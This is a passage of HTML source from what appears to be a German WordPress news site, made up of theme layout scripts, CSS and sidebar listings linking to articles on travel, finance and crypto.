shadow","shadow_m_shadow_size":"","shadow_m_shadow_offset_horizontal":"","shadow_m_shadow_offset_vertical":"","shadow_m_shadow_spread":"","shadow_m_shadow_color":"","btn_txt":"","btn_txt_hover":"","btn_border":"","btn_border_hover":"","pag_text":"","pag_h_text":"","pag_bg":"","pag_h_bg":"","pag_border":"","pag_h_border":"","ajax_pagination_next_prev_swipe":"","ajax_pagination_infinite_stop":"","css":"","td_column_number":1,"header_color":"","color_preset":"","border_top":"","class":"tdi_100","tdc_css_class":"tdi_100","tdc_css_class_style":"tdi_100_rand_style"}';
  1031. block_tdi_100.td_column_number = "1";
  1032. block_tdi_100.block_type = "td_flex_block_1";
  1033. block_tdi_100.post_count = "2";
  1034. block_tdi_100.found_posts = "3784";
  1035. block_tdi_100.header_color = "";
  1036. block_tdi_100.ajax_pagination_infinite_stop = "";
  1037. block_tdi_100.max_num_pages = "1886";
  1038. tdBlocksArray.push(block_tdi_100);
  1039. </script><div class="td-block-title-wrap"></div><div id=tdi_100 class="td_block_inner td-mc1-wrap">
  1040.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  1041.            <div class="td-module-container td-category-pos-above">
  1042.                                    <div class="td-image-container">
  1043.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/die-welt-der-influencer-wie-sie-mit-ihren-smartphones/"  rel="bookmark" class="td-image-wrap " title="Die Welt der Influencer: Wie sie mit ihren Smartphones beeindruckende Fotos kreieren" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Die-Welt-der-Influencer-Wie-sie-mit-ihren-Smartphones-beeindruckende-Fotos-kreieren-696x464.jpg"  ></span></a></div>                                                                    </div>
  1044.                
  1045.                <div class="td-module-meta-info">
  1046.                                        <a href="https://nachrichtenmorgen.de/category/wissenschaft-und-technik/" class="td-post-category">Wissenschaft und Technik</a>
  1047.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/die-welt-der-influencer-wie-sie-mit-ihren-smartphones/"  rel="bookmark" title="Die Welt der Influencer: Wie sie mit ihren Smartphones beeindruckende Fotos kreieren">Die Welt der Influencer: Wie sie mit ihren Smartphones beeindruckende Fotos kreieren</a></h3>
  1048.                    
  1049.                    
  1050.                    <div class="td-excerpt">In der heutigen digitalen Ära haben Influencer einen enormen...</div>
  1051.                    
  1052.                                    </div>
  1053.            </div>
  1054.        </div>
  1055.  
  1056.        
  1057.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  1058.            <div class="td-module-container td-category-pos-above">
  1059.                                    <div class="td-image-container">
  1060.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/mercure-hotel-amsterdam-west/"  rel="bookmark" class="td-image-wrap " title="Entdecken Sie den Komfort und Charme des 4-Sterne Mercure Hotel Amsterdam West" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-19-696x391.jpg"  ></span></a></div>                                                                    </div>
  1061.                
  1062.                <div class="td-module-meta-info">
  1063.                                        <a href="https://nachrichtenmorgen.de/category/reisen/" class="td-post-category">Reisen</a>
  1064.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/mercure-hotel-amsterdam-west/"  rel="bookmark" title="Entdecken Sie den Komfort und Charme des 4-Sterne Mercure Hotel Amsterdam West">Entdecken Sie den Komfort und Charme des 4-Sterne Mercure Hotel Amsterdam West</a></h3>
  1065.                    
  1066.                    
  1067.                    <div class="td-excerpt">Das 4-Sterne Mercure Hotel Amsterdam West ist eine exzellente...</div>
  1068.                    
  1069.                                    </div>
  1070.            </div>
  1071.        </div>
  1072.  
  1073.        </div></div></div></div><div class="vc_column tdi_102  wpb_column vc_column_container tdc-column td-pb-span3">
  1074. <style scoped>.tdi_102{vertical-align:baseline}.tdi_102>.wpb_wrapper,.tdi_102>.wpb_wrapper>.tdc-elements{display:block}.tdi_102>.wpb_wrapper>.tdc-elements{width:100%}.tdi_102>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_102>.wpb_wrapper{width:auto;height:auto}.tdi_102{margin-top:-10px!important;width:20%!important}@media (min-width:1019px) and (max-width:1140px){.tdi_102{margin-top:-2px!important}}@media (max-width:767px){.tdi_102{width:100%!important}}</style><div class="wpb_wrapper" ><div class="tdm_block td_block_wrap tdm_block_column_title tdi_103 tdm-content-horiz-left td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_103" ><div class="td-block-row"><div class="td-block-span12 tdm-col">
  1075. <style>body .tdi_104 .tdm-title{color:#000000}.tdi_104 .tdm-title{font-family:Work Sans!important;font-size:32px!important;line-height:1!important;font-weight:700!important;letter-spacing:-1px!important}@media (min-width:1019px) and (max-width:1140px){.tdi_104 .tdm-title{font-size:26px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_104 .tdm-title{font-size:20px!important}}</style><div class="tds-title tds-title1 td-fix-index tdi_104 "><h3 class="tdm-title tdm-title-sm">Beliebt
  1076. </h3></div></div></div></div><div class="td_block_wrap td_flex_block_1 tdi_105 td-pb-border-top td_block_template_1 td_flex_block"  data-td-block-uid="tdi_105" >
  1077. <style>.tdi_105{margin-top:10px!important;margin-bottom:0px!important;padding-top:15px!important;padding-right:20px!important;padding-bottom:20px!important;padding-left:20px!important;box-shadow:0 0 16px rgba(0,0,0,0.09)!important;position:relative}@media (min-width:768px) and (max-width:1018px){.tdi_105{margin-top:5px!important;padding-top:5px!important;padding-right:10px!important;padding-bottom:10px!important;padding-left:10px!important;box-shadow:0 0 16px rgba(0,0,0,0.09)!important}}@media (max-width:767px){.tdi_105{margin-top:15px!important;box-shadow:0 0 16px rgba(0,0,0,0.09)!important}}@media (min-width:1019px) and (max-width:1140px){.tdi_105{margin-top:5px!important;padding-top:5px!important;padding-right:12px!important;padding-bottom:12px!important;padding-left:12px!important;box-shadow:0 0 16px rgba(0,0,0,0.09)!important}}</style>
  1078. <style>.tdi_105 .entry-thumb{background-position:center 50%}.tdi_105 .td-image-container{display:none}.tdi_105 .entry-thumb{background-image:none!important}body .tdi_105 .td-favorite{font-size:36px;box-shadow:1px 1px 4px 0px rgba(0,0,0,0.2)}.tdi_105 .td-module-meta-info{padding:0px;border-color:#eaeaea}.tdi_105 .td_module_wrap{padding-left:0px;padding-right:0px;padding-bottom:8px;margin-bottom:8px}.tdi_105 .td_block_inner{margin-left:-0px;margin-right:-0px}.tdi_105 .td-module-container:before{bottom:-8px;border-color:#eaeaea}.tdi_105 .td-module-container{border-color:#eaeaea!important}.tdi_105 .td-post-vid-time{display:block}.tdi_105 .td-post-category{margin:0px;padding:0px;background-color:rgba(255,255,255,0);color:#ec3535;border-width:0px;border-style:solid;border-color:#aaa;font-family:Work Sans!important;font-size:12px!important;line-height:1!important;font-weight:600!important;text-transform:uppercase!important;letter-spacing:-0.5px!important}.tdi_105 .td-author-photo .avatar{width:20px;height:20px;margin-right:6px;border-radius:50%}.tdi_105 .td-excerpt{display:none;margin:0px;column-count:1;column-gap:48px}.tdi_105 .td-audio-player{opacity:1;visibility:visible;height:auto;font-size:13px}.tdi_105 .td-read-more{display:none}.tdi_105 .td-author-date{display:inline}.tdi_105 .td-post-author-name{display:none}.tdi_105 .entry-review-stars{display:none}.tdi_105 .td-icon-star,.tdi_105 .td-icon-star-empty,.tdi_105 .td-icon-star-half{font-size:15px}.tdi_105 .td-module-comments{display:none}.tdi_105 .td_module_wrap:nth-last-child(1){margin-bottom:0;padding-bottom:0}.tdi_105 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none}.tdi_105 .td-post-category:hover{background-color:rgba(255,255,255,0)!important;color:#000000}.tdi_105 .td-module-title a{color:#000000;box-shadow:inset 0 0 0 0 #000}.tdi_105 .td_module_wrap:hover .td-module-title a{color:#f43f3f!important}.tdi_105 .td-post-date,.tdi_105 .td-post-author-name span{color:#000000}.tdi_105 .td-module-exclusive .td-module-title a:before{display:inline-block;margin:-4px 5px 0 0;padding:3px 5px;border-radius:2px;color:#ffffff;background-color:#ec3535;font-family:Work Sans!important;font-size:12px!important;line-height:1!important;font-weight:500!important;text-transform:uppercase!important;letter-spacing:-0.5px!important}.tdi_105 .td-module-exclusive:hover .td-module-title a:before{color:#ffffff;background-color:#ec3535}.tdi_105 .entry-title{margin:6px 0;font-family:Work Sans!important;font-size:14px!important;line-height:1.2!important;font-weight:600!important}.tdi_105 .td-editor-date,.tdi_105 .td-editor-date .td-post-author-name a,.tdi_105 .td-editor-date .entry-date,.tdi_105 .td-module-comments a{font-family:Work Sans!important;font-size:12px!important;line-height:1!important;font-weight:500!important;letter-spacing:-0.5px!important}html:not([class*='ie']) .tdi_105 .td-module-container:hover .entry-thumb:before{opacity:0}@media (min-width:768px){.tdi_105 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}@media (min-width:1019px) and (max-width:1140px){.tdi_105 .td-image-container{display:none}.tdi_105 .td_module_wrap{padding-bottom:6px;margin-bottom:6px;padding-bottom:6px!important;margin-bottom:6px!important}.tdi_105 .td-module-container:before{bottom:-6px}.tdi_105 .td_module_wrap:nth-last-child(1){margin-bottom:0!important;padding-bottom:0!important}.tdi_105 .td_module_wrap .td-module-container:before{display:block!important}.tdi_105 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none!important}.tdi_105 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_105 .td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_105 .entry-title{margin:4px 0;font-size:12px!important}@media (min-width:768px){.tdi_105 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (min-width:768px) and (max-width:1018px){.tdi_105 .td-image-container{display:none}.tdi_105 .td_module_wrap{padding-bottom:5px;margin-bottom:5px;padding-bottom:5px!important;margin-bottom:5px!important}.tdi_105 .td-module-container:before{bottom:-5px}.tdi_105 .td-post-category:not(.td-post-extra-category){display:none}.tdi_105 .td-author-date{display:none}.tdi_105 .td-post-date,.tdi_105 .td-post-author-name span{display:none}.tdi_105 .td_module_wrap:nth-last-child(1){margin-bottom:0!important;padding-bottom:0!important}.tdi_105 .td_module_wrap .td-module-container:before{display:block!important}.tdi_105 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none!important}.tdi_105 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_105 .td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_105 .entry-title{margin:0px;font-size:12px!important}.tdi_105 .td-editor-date,.tdi_105 .td-editor-date .td-post-author-name a,.tdi_105 .td-editor-date .entry-date,.tdi_105 .td-module-comments a{font-size:10px!important}@media (min-width:768px){.tdi_105 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (max-width:767px){.tdi_105 .td-image-wrap{padding-bottom:110%}.tdi_105 .td-image-container{flex:0 0 30%;width:30%;display:none}.ie10 .tdi_105 .td-image-container,.ie11 .tdi_105 .td-image-container{flex:0 0 auto}.tdi_105 .td_module_wrap{padding-bottom:8px;margin-bottom:8px;padding-bottom:8px!important;margin-bottom:8px!important}.tdi_105 .td-module-container:before{bottom:-8px}.tdi_105 .td_module_wrap:nth-last-child(1){margin-bottom:0!important;padding-bottom:0!important}.tdi_105 .td_module_wrap .td-module-container:before{display:block!important}.tdi_105 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none!important}.tdi_105 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_105 .td-module-exclusive .td-module-title a:before{font-size:11px!important}@media (min-width:768px){.tdi_105 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}</style>
  1079. <div class="tdi_105_rand_style td-element-style"><style>
  1080. .tdi_105_rand_style{
  1081. background-color:#ffffff !important;
  1082. }
  1083. </style></div><script type="rocketlazyloadscript">var block_tdi_105 = new tdBlock();
  1084. block_tdi_105.id = "tdi_105";
  1085. block_tdi_105.atts = '{"modules_on_row":"","image_size":"","image_floated":"hidden","image_width":"eyJwaG9uZSI6IjMwIn0=","image_height":"eyJwaG9uZSI6IjExMCJ9","show_btn":"none","show_excerpt":"eyJwaG9uZSI6Im5vbmUiLCJhbGwiOiJub25lIn0=","show_com":"eyJwaG9uZSI6Im5vbmUiLCJhbGwiOiJub25lIn0=","show_author":"none","show_cat":"eyJwb3J0cmFpdCI6Im5vbmUifQ==","meta_padding":"0","f_title_font_size":"eyJhbGwiOiIxNCIsImxhbmRzY2FwZSI6IjEyIiwicG9ydHJhaXQiOiIxMiJ9","f_title_font_line_height":"1.2","f_title_font_weight":"600","all_modules_space":"eyJhbGwiOiIxNiIsImxhbmRzY2FwZSI6IjEyIiwicG9ydHJhaXQiOiIxMCJ9","category_id":"","show_date":"eyJwb3J0cmFpdCI6Im5vbmUifQ==","art_excerpt":"0","show_review":"none","tdc_css":"eyJhbGwiOnsibWFyZ2luLXRvcCI6IjEwIiwibWFyZ2luLWJvdHRvbSI6IjAiLCJwYWRkaW5nLXRvcCI6IjE1IiwicGFkZGluZy1yaWdodCI6IjIwIiwicGFkZGluZy1ib3R0b20iOiIyMCIsInBhZGRpbmctbGVmdCI6IjIwIiwic2hhZG93LXNpemUiOiIxNiIsInNoYWRvdy1jb2xvciI6InJnYmEoMCwwLDAsMC4wOSkiLCJiYWNrZ3JvdW5kLWNvbG9yIjoiI2ZmZmZmZiIsImRpc3BsYXkiOiIifSwicG9ydHJhaXQiOnsibWFyZ2luLXRvcCI6IjUiLCJwYWRkaW5nLXRvcCI6IjUiLCJwYWRkaW5nLXJpZ2h0IjoiMTAiLCJwYWRkaW5nLWJvdHRvbSI6IjEwIiwicGFkZGluZy1sZWZ0IjoiMTAiLCJkaXNwbGF5IjoiIn0sInBvcnRyYWl0X21heF93aWR0aCI6MTAxOCwicG9ydHJhaXRfbWluX3dpZHRoIjo3NjgsInBob25lIjp7Im1hcmdpbi10b3AiOiIxNSIsImRpc3BsYXkiOiIifSwicGhvbmVfbWF4X3dpZHRoIjo3NjcsImxhbmRzY2FwZSI6eyJtYXJnaW4tdG9wIjoiNSIsInBhZGRpbmctdG9wIjoiNSIsInBhZGRpbmctcmlnaHQiOiIxMiIsInBhZGRpbmctYm90dG9tIjoiMTIiLCJwYWRkaW5nLWxlZnQiOiIxMiIsImRpc3BsYXkiOiIifSwibGFuZHNjYXBlX21heF93aWR0aCI6MTE0MCwibGFuZHNjYXBlX21pbl93aWR0aCI6MTAxOX0=","f_title_font_family":"653","mc1_el":"10","title_txt_hover":"#f43f3f","title_txt":"#000000","art_title":"eyJhbGwiOiI2cHggMCIsImxhbmRzY2FwZSI6IjRweCAwIiwicG9ydHJhaXQiOiIwIn0=","modules_gap":"0","f_meta_font_size":"eyJhbGwiOiIxMiIsInBvcnRyYWl0IjoiMTAifQ==","f_meta_font_line_height":"1","f_meta_font_weight":"500","f_meta_font_family":"653","modules_cat_border":"0","modules_category_padding":"0","f_cat_font_family":"653","f_cat_font_transform":"uppercase","f_cat_font_size":"12","f_cat_font_weight":"600","f_cat_font_line_height":"1","f_meta_font_spacing":"-0.5","f_cat_font_spacing":"-0.5","cat_bg":"rgba(255,255,255,0)","cat_bg_hover":"rgba(255,255,255,0)","cat_txt":"#ec3535","cat_txt_hover":"#000000","modules_category_margin":"0","modules_category":"above","f_title_font_transform":"","sort":"","excl_padd":"3px 5px","f_excl_font_family":"653","f_excl_font_transform":"uppercase","f_excl_font_size":"eyJhbGwiOiIxMiIsImxhbmRzY2FwZSI6IjExIiwicG9ydHJhaXQiOiIxMSIsInBob25lIjoiMTEifQ==","f_excl_font_weight":"500","f_excl_font_line_height":"1","f_excl_font_spacing":"-0.5","excl_bg":"#ec3535","excl_bg_h":"#ec3535","excl_color":"#ffffff","excl_color_h":"#ffffff","excl_radius":"2","excl_margin":"-4px 5px 0 0","date_txt":"#000000","block_type":"td_flex_block_1","separator":"","custom_title":"","custom_url":"","block_template_id":"","title_tag":"","mc1_tl":"","mc1_title_tag":"","post_ids":"","taxonomies":"","category_ids":"","in_all_terms":"","tag_slug":"","autors_id":"","installed_post_types":"","include_cf_posts":"","exclude_cf_posts":"","linked_posts":"","favourite_only":"","locked_only":"","limit":"5","offset":"","open_in_new_window":"","show_modified_date":"","time_ago":"","time_ago_add_txt":"ago","time_ago_txt_pos":"","review_source":"","el_class":"","td_query_cache":"","td_query_cache_expiration":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","td_ajax_preloading":"","container_width":"","m_padding":"","modules_border_size":"","modules_border_style":"","modules_border_color":"#eaeaea","modules_border_radius":"","modules_divider":"","modules_divider_color":"#eaeaea","h_effect":"","image_alignment":"50","image_radius":"","hide_image":"","show_favourites":"","fav_size":"2","fav_space":"","fav_ico_color":"","fav_ico_color_h":"","fav_bg":"","fav_bg_h":"","fav_shadow_shadow_header":"","fav_shadow_shadow_title":"Shadow","fav_shadow_shadow_size":"","fav_shadow_shadow_offset_horizontal":"","fav_shadow_shadow_offset_vertical":"","fav_shadow_shadow_spread":"","fav_shadow_shadow_color":"","video_icon":"","video_popup":"yes","video_rec":"","spot_header":"","video_rec_title":"","video_rec_color":"","video_rec_disable":"","autoplay_vid":"yes","show_vid_t":"block","vid_t_margin":"","vid_t_padding":"","video_title_color":"","video_title_color_h":"","video_bg":"","video_overlay":"","vid_t_color":"","vid_t_bg_color":"","f_vid_title_font_header":"","f_vid_title_font_title":"Video pop-up article title","f_vid_title_font_settings":"","f_vid_title_font_family":"","f_vid_title_font_size":"","f_vid_title_font_line_height":"","f_vid_title_font_style":"","f_vid_title_font_weight":"","f_vid_title_font_transform":"","f_vid_title_font_spacing":"","f_vid_title_":"","f_vid_time_font_title":"Video duration text","f_vid_time_font_settings":"","f_vid_time_font_family":"","f_vid_time_font_size":"","f_vid_time_font_line_height":"","f_vid_time_font_style":"","f_vid_time_font_weight":"","f_vid_time_font_transform":"","f_vid_time_font_spacing":"","f_vid_time_":"","excl_show":"inline-block","excl_txt":"","all_excl_border":"","all_excl_border_style":"solid","all_excl_border_color":"","excl_border_color_h":"","f_excl_font_header":"","f_excl_font_title":"Label text","f_excl_font_settings":"","f_excl_font_style":"","f_excl_":"","meta_info_align":"","meta_info_horiz":"layout-default","meta_width":"","meta_margin":"","meta_space":"","art_btn":"","meta_info_border_size":"","meta_info_border_style":"","meta_info_border_color":"#eaeaea","meta_info_border_radius":"","modules_category_radius":"0","modules_extra_cat":"","author_photo":"","author_photo_size":"","author_photo_space":"","author_photo_radius":"","review_space":"","review_size":"2.5","review_distance":"","excerpt_col":"1","excerpt_gap":"","excerpt_middle":"","excerpt_inline":"","show_audio":"block","hide_audio":"","art_audio":"","art_audio_size":"1.5","btn_title":"","btn_margin":"","btn_padding":"","btn_border_width":"","btn_radius":"","pag_space":"","pag_padding":"","pag_border_width":"","pag_border_radius":"","prev_tdicon":"","next_tdicon":"","pag_icons_size":"","f_header_font_header":"","f_header_font_title":"Block header","f_header_font_settings":"","f_header_font_family":"","f_header_font_size":"","f_header_font_line_height":"","f_header_font_style":"","f_header_font_weight":"","f_header_font_transform":"","f_header_font_spacing":"","f_header_":"","f_ajax_font_title":"Ajax categories","f_ajax_font_settings":"","f_ajax_font_family":"","f_ajax_font_size":"","f_ajax_font_line_height":"","f_ajax_font_style":"","f_ajax_font_weight":"","f_ajax_font_transform":"","f_ajax_font_spacing":"","f_ajax_":"","f_more_font_title":"Load more button","f_more_font_settings":"","f_more_font_family":"","f_more_font_size":"","f_more_font_line_height":"","f_more_font_style":"","f_more_font_weight":"","f_more_font_transform":"","f_more_font_spacing":"","f_more_":"","f_title_font_header":"","f_title_font_title":"Article title","f_title_font_settings":"","f_title_font_style":"","f_title_font_spacing":"","f_title_":"","f_cat_font_title":"Article category tag","f_cat_font_settings":"","f_cat_font_style":"","f_cat_":"","f_meta_font_title":"Article meta info","f_meta_font_settings":"","f_meta_font_style":"","f_meta_font_transform":"","f_meta_":"","f_ex_font_title":"Article excerpt","f_ex_font_settings":"","f_ex_font_family":"","f_ex_font_size":"","f_ex_font_line_height":"","f_ex_font_style":"","f_ex_font_weight":"","f_ex_font_transform":"","f_ex_font_spacing":"","f_ex_":"","f_btn_font_title":"Article read more button","f_btn_font_settings":"","f_btn_font_family":"","f_btn_font_size":"","f_btn_font_line_height":"","f_btn_font_style":"","f_btn_font_weight":"","f_btn_font_transform":"","f_btn_font_spacing":"","f_btn_":"","mix_color":"","mix_type":"","fe_brightness":"1","fe_contrast":"1","fe_saturate":"1","mix_color_h":"","mix_type_h":"","fe_brightness_h":"1","fe_contrast_h":"1","fe_saturate_h":"1","m_bg":"","color_overlay":"","shadow_shadow_header":"","shadow_shadow_title":"Module Shadow","shadow_shadow_size":"","shadow_shadow_offset_horizontal":"","shadow_shadow_offset_vertical":"","shadow_shadow_spread":"","shadow_shadow_color":"","all_underline_height":"","all_underline_color":"","cat_border":"","cat_border_hover":"","meta_bg":"","author_txt":"","author_txt_hover":"","ex_txt":"","com_bg":"","com_txt":"","rev_txt":"","audio_btn_color":"","audio_time_color":"","audio_bar_color":"","audio_bar_curr_color":"","shadow_m_shadow_header":"","shadow_m_shadow_title":"Meta info shadow","shadow_m_shadow_size":"","shadow_m_shadow_offset_horizontal":"","shadow_m_shadow_offset_vertical":"","shadow_m_shadow_spread":"","shadow_m_shadow_color":"","btn_bg":"","btn_bg_hover":"","btn_txt":"","btn_txt_hover":"","btn_border":"","btn_border_hover":"","pag_text":"","pag_h_text":"","pag_bg":"","pag_h_bg":"","pag_border":"","pag_h_border":"","ajax_pagination":"","ajax_pagination_next_prev_swipe":"","ajax_pagination_infinite_stop":"","css":"","td_column_number":1,"header_color":"","color_preset":"","border_top":"","class":"tdi_105","tdc_css_class":"tdi_105","tdc_css_class_style":"tdi_105_rand_style"}';
  1086. block_tdi_105.td_column_number = "1";
  1087. block_tdi_105.block_type = "td_flex_block_1";
  1088. block_tdi_105.post_count = "5";
  1089. block_tdi_105.found_posts = "3784";
  1090. block_tdi_105.header_color = "";
  1091. block_tdi_105.ajax_pagination_infinite_stop = "";
  1092. block_tdi_105.max_num_pages = "757";
  1093. tdBlocksArray.push(block_tdi_105);
  1094. </script><div class="td-block-title-wrap"></div><div id=tdi_105 class="td_block_inner td-mc1-wrap">
  1095.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  1096.            <div class="td-module-container td-category-pos-above">
  1097.                                    <div class="td-image-container">
  1098.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/finanzeno-net/" rel="bookmark" class="td-image-wrap " title="Finanzeno.net Schafft Erstklassige Online-Finanzplattformen"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/05/Finanzeno.net-Schafft-Erstklassige-Online-Finanzplattformen-696x392.jpg"  ></span></a></div>                                                                    </div>
  1099.                
  1100.                <div class="td-module-meta-info">
  1101.                                        <a href="https://nachrichtenmorgen.de/category/finanzen-und-vertrag/" class="td-post-category">Finanzen und Vertrag</a>
  1102.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/finanzeno-net/" rel="bookmark" title="Finanzeno.net Schafft Erstklassige Online-Finanzplattformen">Finanzeno.net Schafft Erstklassige Online-Finanzplattformen</a></h3>
  1103.                    
  1104.                                            <div class="td-editor-date">
  1105.                                                        
  1106.                                                            <span class="td-author-date">
  1107.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-06T17:15:57+02:00" >Mai 6, 2024</time></span>                                                                        <span class="td-module-comments"><a href="https://nachrichtenmorgen.de/finanzeno-net/#respond">0</a></span>                                </span>
  1108.                                                    </div>
  1109.                    
  1110.                    <div class="td-excerpt">Finanzeno.net, ein führender Name im Finanzdienstleistungssektor, setzt weiterhin hohe...</div>
  1111.                    
  1112.                                    </div>
  1113.            </div>
  1114.        </div>
  1115.  
  1116.        
  1117.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  1118.            <div class="td-module-container td-category-pos-above">
  1119.                                    <div class="td-image-container">
  1120.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/die-letzten-jahre-waren-fuer-krypto-investoren/" rel="bookmark" class="td-image-wrap " title="Die letzten Jahre waren für Krypto-Investoren und Krypto-Börsenbesitzer ein wilder Ritt."><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/05/Die-letzten-Jahre-waren-fuer-Krypto-Investoren-und-Krypto-Boersenbesitzer-ein-wilder-Ritt.jpg"  ></span></a></div>                                                                    </div>
  1121.                
  1122.                <div class="td-module-meta-info">
  1123.                                        <a href="https://nachrichtenmorgen.de/category/krypto/" class="td-post-category">Krypto</a>
  1124.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/die-letzten-jahre-waren-fuer-krypto-investoren/" rel="bookmark" title="Die letzten Jahre waren für Krypto-Investoren und Krypto-Börsenbesitzer ein wilder Ritt.">Die letzten Jahre waren für Krypto-Investoren und Krypto-Börsenbesitzer ein wilder Ritt.</a></h3>
  1125.                    
  1126.                                            <div class="td-editor-date">
  1127.                                                        
  1128.                                                            <span class="td-author-date">
  1129.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-04T15:49:51+02:00" >Mai 4, 2024</time></span>                                                                        <span class="td-module-comments"><a href="https://nachrichtenmorgen.de/die-letzten-jahre-waren-fuer-krypto-investoren/#respond">0</a></span>                                </span>
  1130.                                                    </div>
  1131.                    
  1132.                    <div class="td-excerpt">5 Krypto-Trends, denen man im Jahr 2024 und darüber...</div>
  1133.                    
  1134.                                    </div>
  1135.            </div>
  1136.        </div>
  1137.  
  1138.        
  1139.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  1140.            <div class="td-module-container td-category-pos-above">
  1141.                                    <div class="td-image-container">
  1142.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/carmel-by-the-sea/" rel="bookmark" class="td-image-wrap " title="Carmel-by-the-Sea: Ein idyllisches Paradies an der kalifornischen Küste"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-10-696x391.jpg"  ></span></a></div>                                                                    </div>
  1143.                
  1144.                <div class="td-module-meta-info">
  1145.                                        <a href="https://nachrichtenmorgen.de/category/reisen/" class="td-post-category">Reisen</a>
  1146.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/carmel-by-the-sea/" rel="bookmark" title="Carmel-by-the-Sea: Ein idyllisches Paradies an der kalifornischen Küste">Carmel-by-the-Sea: Ein idyllisches Paradies an der kalifornischen Küste</a></h3>
  1147.                    
  1148.                                            <div class="td-editor-date">
  1149.                                                        
  1150.                                                            <span class="td-author-date">
  1151.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-02T10:51:42+02:00" >Mai 2, 2024</time></span>                                                                        <span class="td-module-comments"><a href="https://nachrichtenmorgen.de/carmel-by-the-sea/#respond">0</a></span>                                </span>
  1152.                                                    </div>
  1153.                    
  1154.                    <div class="td-excerpt">Carmel-by-the-Sea, oft einfach als Carmel bekannt, ist ein malerisches...</div>
  1155.                    
  1156.                                    </div>
  1157.            </div>
  1158.        </div>
  1159.  
  1160.        
  1161.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  1162.            <div class="td-module-container td-category-pos-above">
  1163.                                    <div class="td-image-container">
  1164.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/mietwagen-in-den-usa/" rel="bookmark" class="td-image-wrap " title="Mietwagen in den USA: Ein umfassender Ratgeber für Ihre Buchung"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-1-1-696x391.jpg"  ></span></a></div>                                                                    </div>
  1165.                
  1166.                <div class="td-module-meta-info">
  1167.                                        <a href="https://nachrichtenmorgen.de/category/reisen/" class="td-post-category">Reisen</a>
  1168.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/mietwagen-in-den-usa/" rel="bookmark" title="Mietwagen in den USA: Ein umfassender Ratgeber für Ihre Buchung">Mietwagen in den USA: Ein umfassender Ratgeber für Ihre Buchung</a></h3>
  1169.                    
  1170.                                            <div class="td-editor-date">
  1171.                                                        
  1172.                                                            <span class="td-author-date">
  1173.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-02T09:51:40+02:00" >Mai 2, 2024</time></span>                                                                        <span class="td-module-comments"><a href="https://nachrichtenmorgen.de/mietwagen-in-den-usa/#respond">0</a></span>                                </span>
  1174.                                                    </div>
  1175.                    
  1176.                    <div class="td-excerpt">Ein Roadtrip durch die USA mit dem Mietwagen –...</div>
  1177.                    
  1178.                                    </div>
  1179.            </div>
  1180.        </div>
  1181.  
  1182.        
  1183.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  1184.            <div class="td-module-container td-category-pos-above">
  1185.                                    <div class="td-image-container">
